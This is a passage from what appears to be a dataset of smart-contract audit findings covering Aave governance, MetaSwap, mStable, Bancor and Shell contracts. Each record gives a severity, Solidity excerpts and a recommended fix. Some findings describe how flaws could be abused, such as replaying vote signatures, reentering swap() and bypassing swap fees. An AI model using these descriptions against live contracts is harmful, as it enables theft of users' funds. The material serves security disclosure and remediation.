internalMoveToValidating(\\_proposalId);\\n return; // <- this was added\\n }\\n }\\n }\\n}\\n```\\n\\nAn additional change can be done to `internalMoveToValidating` because it is called only in `tryToMoveToValidating` and the parent method already does the check.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n // The line below can be removed\\n // require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\nчч```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n -VotingMachine - verifyNonce should only allow the next nonceчhighчWhen a relayer calls `submitVoteByRelayer` they also need to provide a nonce. This nonce is cryptographicly checked against the provided signature. It is also checked again to be higher than the previous nonce saved for that voter.\\n```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n}\\n```\\n\\nWhen the vote is saved, the previous nonce is incremented.\\n```\\nvoter.nonce = voter.nonce.add(1);\\n```\\n\\nThis leaves the opportunity to use the same signature to vote multiple times, as long as the provided nonce is higher than the incremented nonce.чThe check should be more restrictive and make sure the consecutive nonce was provided.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce + 1 == \\_relayerNonce, \"INVALID\\_NONCE\");\\n```\\nчч```\\n/// @notice Verifies the nonce of a voter on a proposal\\n/// @param \\_proposalId The id of the proposal\\n/// @param \\_voter The address of the voter\\n/// @param \\_relayerNonce The nonce submitted by the relayer\\nfunction verifyNonce(uint256 \\_proposalId, address \\_voter, uint256 \\_relayerNonce) public view {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n}\\n```\\n -VoteMachine - Cancelling vote does not increase the nonceчlowчA vote can be cancelled by calling `cancelVoteByRelayer` with the proposal ID, nonce, voter's address, signature and a hash of the sent params.\\nThe parameters are hashed and checked against the signature correctly.\\nThe nonce is part of these parameters and it is checked to be valid.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n```\\n\\nOnce the vote is cancelled, the data is cleared but the nonce is not increased.\\n```\\nif (\\_cachedVoter.balance > 0) {\\n \\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n \\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n voter.weight = 0;\\n voter.balance = 0;\\n voter.vote = 0;\\n voter.asset = address(0);\\n emit VoteCancelled(\\n \\_proposalId,\\n \\_voter,\\n \\_cachedVoter.vote,\\n \\_cachedVoter.asset,\\n \\_cachedVoter.weight,\\n \\_cachedVoter.balance,\\n uint256(\\_proposal.proposalStatus)\\n );\\n}\\n```\\n\\nThis means that in the future, the same signature can be used as long as the nonce is still higher than the current one.чConsidering the recommendation from issue https://github.com/ConsenSys/aave-governance-dao-audit-2020-01/issues/4 is implemented, the nonce should also increase when the vote is cancelled. Otherwise the same signature can be replayed again.чч```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n```\\n -Possible lock ups with SafeMath multiplication AcknowledgedчlowчIn some cases using SafeMath can lead to a situation where a contract is locked up due to an unavoidable overflow.\\nIt is theoretically possible that both the `internalSubmitVote()` and `internalCancelVote()` functions could become unusable by voters with a high enough balance, if the asset weighting is set extremely high.\\nThis line in `internalSubmitVote()` could overflow if the voter's balance and the asset weight were sufficiently high:\\n```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n\\nA similar situation occurs in internalCancelVote():\\n```\\n\\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n\\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n```\\nчThis could be protected against by setting a maximum value for asset weights. In practice it is very unlikely to occur in this situation, but it could be introduced at some point in the future.чч```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n -Reentrancy vulnerability in MetaSwap.swap()чhighч`MetaSwap.swap()` should have a reentrancy guard.\\nThe adapters use this general process:\\nCollect the from token (or ether) from the user.\\nExecute the trade.\\nTransfer the contract's balance of tokens (from and to) and ether to the user.\\nIf an attacker is able to reenter `swap()` before step 3, they can execute their own trade using the same tokens and get all the tokens for themselves.\\nThis is partially mitigated by the check against `amountTo` in `CommonAdapter`, but note that the `amountTo` typically allows for slippage, so it may still leave room for an attacker to siphon off some amount while still returning the required minimum to the user.\\n```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, \"INSUFFICIENT\\_AMOUNT\");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n\\nAs an example of how this could be exploited, 0x supports an “EIP1271Wallet” signature type, which invokes an external contract to check whether a trade is allowed. A malicious maker might front run the swap to reduce their inventory. This way, the taker is sending more of the taker asset than necessary to `MetaSwap`. The excess can be stolen by the maker during the EIP1271 call.чUse a simple reentrancy guard, such as OpenZeppelin's `ReentrancyGuard` to prevent reentrancy in `MetaSwap.swap()`. It might seem more obvious to put this check in `Spender.swap()`, but the `Spender` contract intentionally does not use any storage to avoid interference between different adapters.чч```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, \"INSUFFICIENT\\_AMOUNT\");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n -Simplify fee calculation in WethAdapterчlowч`WethAdapter` does some arithmetic to keep track of how much ether is being provided as a fee versus as funds that should be transferred into WETH:\\n```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, \"MSG\\_VAL\\_INSUFFICIENT\");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n\\nThis code can be simplified by using `address(this).balance` instead.чResolution\\nConsenSys/[email protected]93bf5c6.\\nConsider something like the following code instead:\\n```\\nif (address(tokenFrom) == Constants.ETH) {\\n getWETH().deposit{value: amountFrom}(); // will revert if the contract has an insufficient balance\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Send the remaining balance as the fee.\\naggregator.functionCallWithValue(abi.encodePacked(method, data), address(this).balance);\\n```\\n\\nAside from being a little simpler, this way of writing the code makes it obvious that the full balance is being properly consumed. Part is traded, and the rest is sent as a fee.чч```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, \"MSG\\_VAL\\_INSUFFICIENT\");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n -Consider checking adapter existence in MetaSwapчlowч`MetaSwap` doesn't check that an adapter exists before calling into Spender:\\n```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n\\nThen `Spender` performs the check and reverts if it receives `address(0)`.\\n```\\nfunction swap(address adapter, bytes calldata data) external payable {\\n require(adapter != address(0), \"ADAPTER\\_NOT\\_SUPPORTED\");\\n```\\n\\nIt can be difficult to decide where to put a check like this, especially when the operation spans multiple contracts. Arguments can be made for either choice (or even duplicating the check), but as a general rule it's a good idea to avoid passing invalid parameters internally. Checking for adapter existence in `MetaSwap.swap()` is a natural place to do input validation, and it means `Spender` can have a simpler model where it trusts its inputs (which always come from MetaSwap).чDrop the check from `Spender.swap()` and perform the check instead in `MetaSwap.swap()`.чч```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n -Swap fees can be bypassed using redeemMassetчhighчPart of the value proposition for liquidity providers is earning fees incurred for swapping between assets. However, traders can perform fee-less swaps by providing liquidity in one bAsset, followed by calling `redeemMasset()` to convert the resulting mAssets back into a proportional amount of bAssets. Since removing liquidity via `redeemMasset()` does not incur a fee this is equivalent to doing a swap with zero fees.\\nAs a very simple example, assuming a pool with 2 bAssets (say, DAI and USDT), it would be possible to swap 10 DAI to USDT as follows:\\nAdd 20 DAI to the pool, receive 20 mUSD\\ncall redeemMasset() to redeem 10 DAI and 10 USDT\\nThe boolean argument `applyFee` is set to `false` in _redeemMasset:\\n```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\nчResolution\\nThis issue was reported independently via the bug bounty program and was fixed early during the audit. The fix has already been deployed on mainnet using the upgrade mechanism\\nCharge a small redemption fee in `redeemMasset()`.чч```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\n -Users can collect interest from SavingsContract by only staking mTokens momentarilyчhighчThe SAVE contract allows users to deposit mAssets in return for lending yield and swap fees. When depositing mAsset, users receive a “credit” tokens at the momentary credit/mAsset exchange rate which is updated at every deposit. However, the smart contract enforces a minimum timeframe of 30 minutes in which the interest rate will not be updated. A user who deposits shortly before the end of the timeframe will receive credits at the stale interest rate and can immediately trigger and update of the rate and withdraw at the updated (more favorable) rate after the 30 minutes window. As a result, it would be possible for users to benefit from interest payouts by only staking mAssets momentarily and using them for other purposes the rest of the time.\\n```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\nчRemove the 30 minutes window such that every deposit also updates the exchange rate between credits and tokens. Note that this issue was reported independently during the bug bounty program and a fix is currently being worked on.чч```\\n// 1. Only collect interest if it has been 30 mins\\nuint256 timeSinceLastCollection = now.sub(previousCollection);\\nif(timeSinceLastCollection > THIRTY\\_MINUTES) {\\n```\\n -Internal accounting of vault balance may diverge from actual token balance in lending pool Won't FixчmediumчIt is possible that the vault balance for a given bAsset is greater than the corresponding balance in the lending pool. This violates one of the correctness properties stated in the audit brief. Our Harvey fuzzer was able to generate a transaction that mints a small amount (0xf500) of mAsset. Due to the way that the lending pool integration (Compound in this case) updates the vault balance it ends up greater than the available balance in the lending pool.\\nMore specifically, the integration contract assumes that the amount deposited into the pool is equal to the amount received by the mAsset contract for the case where no transaction fees are charged for token transfers:\\n```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n\\nFor illustration, consider the following scenario: assume your current balance in a lending pool is 0. When you deposit some amount X into the lending pool your balance after the deposit may be less than X (even if the underlying token does not charge transfer fees). One reason for this is rounding, but, in theory, a lending pool could also charge fees, etc.\\nThe vault balance is updated in function `Masset._mintTo` based on the amount returned by the integration.\\n```\\nbasketManager.increaseVaultBalance(bInfo.index, integrator, quantityDeposited);\\n```\\n\\n```\\nuint256 deposited = IPlatformIntegration(\\_integrator).deposit(\\_bAsset, quantityTransferred, \\_erc20TransferFeeCharged);\\n```\\n\\nThis violation of the correctness property is temporary since the vault balance is readjusted when interest is collected. However, the time frame of ca. 30 minutes between interest collections (may be longer if no continuous interest is distributed) means that it may be violated for substantial periods of time.\\n```\\nuint256 balance = IPlatformIntegration(integrations[i]).checkBalance(b.addr);\\nuint256 oldVaultBalance = b.vaultBalance;\\n\\n// accumulate interest (ratioed bAsset)\\nif(balance > oldVaultBalance && b.status == BassetStatus.Normal) {\\n // Update balance\\n basket.bassets[i].vaultBalance = balance;\\n```\\n\\nThe regular updates due to interest collection should ensure that the difference stays relatively small. However, note that the following scenarios is feasible: assuming there is 0 DAI in the basket, a user mints X mUSD by depositing X DAI. While the interest collection hasn't been triggered yet, the user tries to redeem X mUSD for DAI. This may fail since the amount of DAI in the lending pool is smaller than X.чIt seems like this issue could be fixed by using the balance increase from the lending pool to update the vault balance (much like for the scenario where transfer fees are charged) instead of using the amount received.чч```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n -Missing validation in Masset._redeemTo AcknowledgedчmediumчIn function `_redeemTo` the collateralisation ratio is not taken into account unlike in _redeemMasset:\\n```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n\\nIt seems like `_redeemTo` should not be executed if the collateralisation ratio is below 100%. However, the contracts (that is, `Masset` and ForgeValidator) themselves don't seem to enforce this explicitly. Instead, the governor needs to ensure that the collateralisation ratio is only set to a value below 100% when the basket is not “healthy” (for instance, if it is considered “failed”). Failing to ensure this may allow an attacker to redeem a disproportionate amount of assets. Note that the functionality for setting the collateralisation ratio is not currently implemented in the audited code.чConsider enforcing the intended use of `_redeemTo` more explicitly. For instance, it might be possible to introduce additional input validation by requiring that the collateralisation ratio is not below 100%.чч```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n -Removing a bAsset might leave some tokens stuck in the vault AcknowledgedчlowчIn function `_removeBasset` there is existing validation to make sure only “empty” vaults are removed:\\n```\\nrequire(bAsset.vaultBalance == 0, \"bAsset vault must be empty\");\\n```\\n\\nHowever, this is not necessarily sufficient since the lending pool balance may be higher than the vault balance. The reason is that the vault balance is usually slightly out-of-date due to the 30 minutes time span between interest collections. Consider the scenario: (1) a user swaps out an asset 29 minutes after the last interest collection to reduce its vault balance from 100 USD to 0, and (2) the governor subsequently remove the asset. During those 29 minutes the asset was collecting interest (according to the lending pool the balance was higher than 100 USD at the time of the swap) that is now “stuck” in the vault.чConsider adding additional input validation (for instance, by requiring that the lending pool balance to be 0) or triggering a swap directly when removing an asset from the basket.чч```\\nrequire(bAsset.vaultBalance == 0, \"bAsset vault must be empty\");\\n```\\n -Unused parameter in BasketManager._addBasset Won't FixчlowчIt seems like the `_measurementMultiple` parameter is always `StableMath.getRatioScale()` (1e8). There is also some range validation code that seems unnecessary if the parameter is always 1e8.\\n```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, \"MM out of range\");\\n```\\nчConsider removing the parameter and the input validation to improve the readability of the code.чч```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, \"MM out of range\");\\n```\\n -Assumptions are made about interest distribution Won't FixчlowчThere is a mechanism that prevents interest collection if the extrapolated APY exceeds a threshold (MAX_APY).\\n```\\nrequire(extrapolatedAPY < MAX\\_APY, \"Interest protected from inflating past maxAPY\");\\n```\\n\\nThe extrapolation seems to assume that the interest is payed out frequently and continuously. It seems like a less frequent payout (for instance, once a month/year) could be rejected since the extrapolation considers the interest since the last time that `collectAndDistributeInterest` was called (potentially without interest being collected).чConsider revisiting or documenting this assumption. For instance, one could consider extrapolating between the current time and the last time that (non-zero) interest was actually collected.чч```\\nrequire(extrapolatedAPY < MAX\\_APY, \"Interest protected from inflating past maxAPY\");\\n```\\n -Assumptions are made about Aave and Compound integrations AcknowledgedчlowчThe code makes several assumptions about the Aave and Compound integrations. A malicious or malfunctioning integration (or lending pool) might violate those assumptions. This might lead to unintended behavior in the system. Below are three such assumptions:\\nfunction `checkBalance` reverts if the token hasn't been added:\\n```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n\\nfunction `withdraw` is trusted to not fail when it shouldn't:\\n```\\nIPlatformIntegration(\\_integrators[i]).withdraw(\\_recipient, bAsset, q, \\_bAssets[i].isTransferFeeCharged);\\n```\\n\\nthe mapping from mAssets to pTokens is fixed:\\n```\\nrequire(bAssetToPToken[\\_bAsset] == address(0), \"pToken already set\");\\n```\\n\\nThe first assumption could be avoided by adding a designated function to check if the token was added.\\nThe second assumption is more difficult to avoid, but should be considered when adding new integrations. The system needs to trust the lending pools to work properly; for instance, if the lending pool would blacklist the integration contract the system may behave in unintended ways.\\nThe third assumption could be avoided, but it comes at a cost.чConsider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes. One should also be careful to avoid coupling between external systems. For instance, if withdrawing from Aave fails this should not prevent withdrawing from Compound.чч```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n -Assumptions are made about bAssets AcknowledgedчlowчThe code makes several assumptions about the bAssets that can be used. A malicious or malfunctioning asset contract might violate those assumptions. This might lead to unintended behavior in the system. Below there are several such assumptions:\\nDecimals of a bAsset are constant where the decimals are used to derive the asset's ratio:\\n```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n\\nDecimals must be in a range from 4 to 18:\\n```\\nrequire(decimals >= 4 && decimals <= 18, \"Token must have sufficient decimal places\");\\n```\\n\\nThe governor is able to foresee when transfer fees are charged (which needs to be called if anything changes); in theory, assets could be much more flexible in when transfer fees are charged (for instance, during certain periods or for certain users)\\n```\\nfunction setTransferFeesFlag(address \\_bAsset, bool \\_flag)\\n```\\n\\nIt seems like some of these assumptions could be avoided, but there might be a cost. For instance, one could retrieve the decimals directly instead of “caching” them and one could always enable the setting where transfer fees may be charged.чConsider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes.чч```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n -Unused field in ForgePropsMulti struct Won't FixчlowчThe `ForgePropsMulti` struct defines the field `isValid` which always seems to be true:\\n```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n\\nIf it is indeed always true, one could remove the following line:\\n```\\nif(!props.isValid) return 0;\\n```\\nчIf the field is indeed always true please consider removing it to simplify the code.чч```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n -BassetStatus enum defines multiple unused states Won't FixчlowчThe `BassetStatus` enum defines several values that do not seem to be assigned in the code:\\nDefault (different from “Normal”?)\\nBlacklisted\\nLiquidating\\nLiquidated\\nFailed\\n```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n\\nSince some of these are used in the code there might be some dead code that can be removed as a result. For example:\\n```\\n\\_bAsset.status == BassetStatus.Liquidating ||\\n\\_bAsset.status == BassetStatus.Blacklisted\\n```\\nчIf those values are indeed never used please consider removing them to simplify the code.чч```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n -Potential gas savings by terminating early AcknowledgedчlowчIf a function invocation is bound to revert, one should try to revert as soon as possible to save gas. In `ForgeValidator.validateRedemption` it is possible to terminate more early:\\n```\\nif(atLeastOneBecameOverweight) return (false, \"bAssets must remain below max weight\", false);\\n```\\nчConsider moving the require-statement a few lines up (for instance, after assigning to atLeastOneBecameOverweight).чч```\\nif(atLeastOneBecameOverweight) return (false, \"bAssets must remain below max weight\", false);\\n```\\n -Discrepancy between code and commentsчlowчThere is a discrepancy between the code at:\\n```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, \"Basket weight must be >= 100 && <= 400%\");\\n```\\n\\nAnd the comment at:\\n```\\n\\* @dev Throws if the total Basket weight does not sum to 100\\n```\\nчUpdate the code or the comment to be consistent.чч```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, \"Basket weight must be >= 100 && <= 400%\");\\n```\\n -Loss of the liquidity pool is not equally distributedчhighчAll stakeholders in the liquidity pool should be able to withdraw the same amount as they staked plus a share of fees that the converter earned during their staking period.\\n```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n\\nThe problem is that sometimes there might not be enough funds in reserve (for example, due to this issue https://github.com/ConsenSys/bancor-audit-2020-06/issues/4). So the first ones who withdraw their stakes receive all the tokens they own. But the last stakeholders might not be able to get their funds back because the pool is empty already.\\nSo under some circumstances, there is a chance that users can lose all of their staked funds.\\nThis issue also has the opposite side: if the liquidity pool makes an extra profit, the stakers do not owe this profit and cannot withdraw it.чResolution\\nThe issue was addressed by adding a new fee mechanism called ‘adjusted fees'. This mechanism aims to decrease the deficit of the reserves over time. If there is a deficit of reserves, it is usually present on the secondary token side, because there is a strong incentive to bring the primary token to the balanced state. Roughly speaking, the idea is that if the secondary token has a deficit in reserves, there are additional fees for trading that token. These fees are not distributed across the liquidity providers like the regular fees. Instead, they are just populating the reserve, decreasing the existing deficit.\\nLoss is still not distributed across the liquidity providers, and there is a possibility that there are not enough funds for everyone to withdraw them. In the case of a run on reserves, LPs will be able to withdraw funds on a first-come-first-serve basis.\\nDistribute losses evenly across the liquidity providers.чч```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n -Use of external calls with a fixed amount of gas Won't FixчmediumчThe converter smart contract uses the Solidity transfer() function to transfer Ether.\\n.transfer() and .send() forward exactly 2,300 gas to the recipient. The goal of this hardcoded gas stipend was to prevent reentrancy vulnerabilities, but this only makes sense under the assumption that gas costs are constant. Recently EIP 1884 was included in the Istanbul hard fork. One of the changes included in EIP 1884 is an increase to the gas cost of the SLOAD operation, causing a contract's fallback function to cost more than 2300 gas.\\n```\\n\\_to.transfer(address(this).balance);\\n```\\n\\n```\\nif (\\_targetToken == ETH\\_RESERVE\\_ADDRESS)\\n```\\n\\n```\\nmsg.sender.transfer(reserveAmount);\\n```\\nчResolution\\nIt was decided to accept this minor risk as the usage of .call() might introduce other unexpected behavior.\\nIt's recommended to stop using .transfer() and .send() and instead use .call(). Note that .call() does nothing to mitigate reentrancy attacks, so other precautions must be taken. To prevent reentrancy attacks, it is recommended that you use the checks-effects-interactions pattern.чч```\\n\\_to.transfer(address(this).balance);\\n```\\n -Use of assert statement for input validationчlowчSolidity assertion should only be used to assert invariants, i.e. statements that are expected to always hold if the code behaves correctly. Note that all available gas is consumed when an assert-style exception occurs.\\nIt appears that assert() is used in one location within the test scope to catch invalid user inputs:\\n```\\nassert(amount < targetReserveBalance);\\n```\\nчUsing `require()` instead of `assert()`.чч```\\nassert(amount < targetReserveBalance);\\n```\\n -Certain functions lack input validation routinesчhighчThe functions should first check if the passed arguments are valid first. The checks-effects-interactions pattern should be implemented throughout the code.\\nThese checks should include, but not be limited to:\\n`uint` should be larger than `0` when `0` is considered invalid\\n`uint` should be within constraints\\n`int` should be positive in some cases\\nlength of arrays should match if more arrays are sent as arguments\\naddresses should not be `0x0`\\nThe function `includeAsset` does not do any checks before changing the contract state.\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nThe internal function called by the public method `includeAsset` again doesn't check any of the data.\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssimilator = shell.assimilators[\\_numeraire];\\n\\n \\_numeraireAssimilator.addr = \\_numeraireAssim;\\n\\n \\_numeraireAssimilator.ix = uint8(shell.numeraires.length);\\n\\n shell.numeraires.push(\\_numeraireAssimilator);\\n\\n Assimilators.Assimilator storage \\_reserveAssimilator = shell.assimilators[\\_reserve];\\n\\n \\_reserveAssimilator.addr = \\_reserveAssim;\\n\\n \\_reserveAssimilator.ix = uint8(shell.reserves.length);\\n\\n shell.reserves.push(\\_reserveAssimilator);\\n\\n shell.weights.push(\\_weight.divu(1e18).add(uint256(1).divu(1e18)));\\n\\n}\\n```\\n\\nSimilar with `includeAssimilator`.\\n```\\nfunction includeAssimilator (address \\_numeraire, address \\_derivative, address \\_assimilator) public onlyOwner {\\n shell.includeAssimilator(\\_numeraire, \\_derivative, \\_assimilator);\\n}\\n```\\n\\nAgain no checks are done in any function.\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\nNot only does the administrator functions not have any checks, but also user facing functions do not check the arguments.\\nFor example `swapByOrigin` does not check any of the arguments if you consider it calls `MainnetDaiToDaiAssimilator`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, 